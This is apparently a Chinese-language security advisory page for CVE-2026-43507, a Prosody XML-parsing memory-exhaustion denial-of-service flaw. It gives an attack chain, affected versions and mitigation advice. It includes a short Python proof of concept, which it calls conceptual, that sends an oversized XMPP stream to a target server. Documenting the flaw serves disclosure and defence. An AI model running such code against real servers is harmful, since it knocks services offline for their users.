IPBUF安全漏洞报告
English
CVE-2026-43507 CVSS 5.3 中危

CVE-2026-43507 Prosody XML解析内存耗尽DoS漏洞

披露日期: 2026-05-01
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-43507
漏洞类型
拒绝服务
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Prosody

相关标签

拒绝服务ProsodyXML解析内存耗尽

漏洞概述

Prosody 在 0.12.6 之前和 13.0.5 之前的版本中存在一个安全漏洞。攻击者可以通过未经身份验证的连接发送特制的 XML 数据,利用 XML 解析过程中的资源放大问题,导致服务器内存耗尽,从而引发拒绝服务攻击。

技术细节

该漏洞是由于 Prosody 在处理 XML 数据时未对资源消耗进行有效限制所致。攻击者无需用户交互或认证即可通过网络发起攻击。通过发送精心构造的 XML 数据流,触发解析器的资源放大机制,导致服务器分配大量内存。当攻击者持续发送此类数据或利用并发连接时,服务器内存将被迅速耗尽,最终导致服务崩溃或无法响应正常请求。

攻击链分析

STEP 1
步骤1:信息收集
攻击者扫描网络,识别出运行易受攻击版本 Prosody 的目标服务器。
STEP 2
步骤2:建立连接
攻击者向目标服务器的 XMPP 端口(默认为 5222 或 5269)发起 TCP 连接,此过程无需身份认证。
STEP 3
步骤3:发送恶意载荷
攻击者通过建立的连接发送特制的 XML 数据包,利用解析器的资源放大缺陷消耗服务器内存。
STEP 4
步骤4:资源耗尽
服务器因处理恶意 XML 流量而耗尽可用内存,导致系统变慢、服务停止响应或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket def send_malicious_xml(host, port=5222): try: # Connect to the Prosody server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) # Send malicious XML stream header to trigger resource amplification # Note: This is a conceptual PoC. Actual payload may vary based on specific parser behavior. payload = "<stream:stream xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>" payload += "<attack>" + "A" * 10000000 + "</attack>" # Large payload to exhaust memory s.send(payload.encode('utf-8')) print(f"[+] Payload sent to {host}:{port}") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target_host = "192.168.1.10" send_malicious_xml(target_host)

影响范围

Prosody < 0.12.6
Prosody >= 1.0.0, < 13.0.5

防御指南

临时缓解措施
建议限制来自未认证 IP 的连接速率,并在边界防火墙上实施流量监控,以阻断异常的 XML 大包传输。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表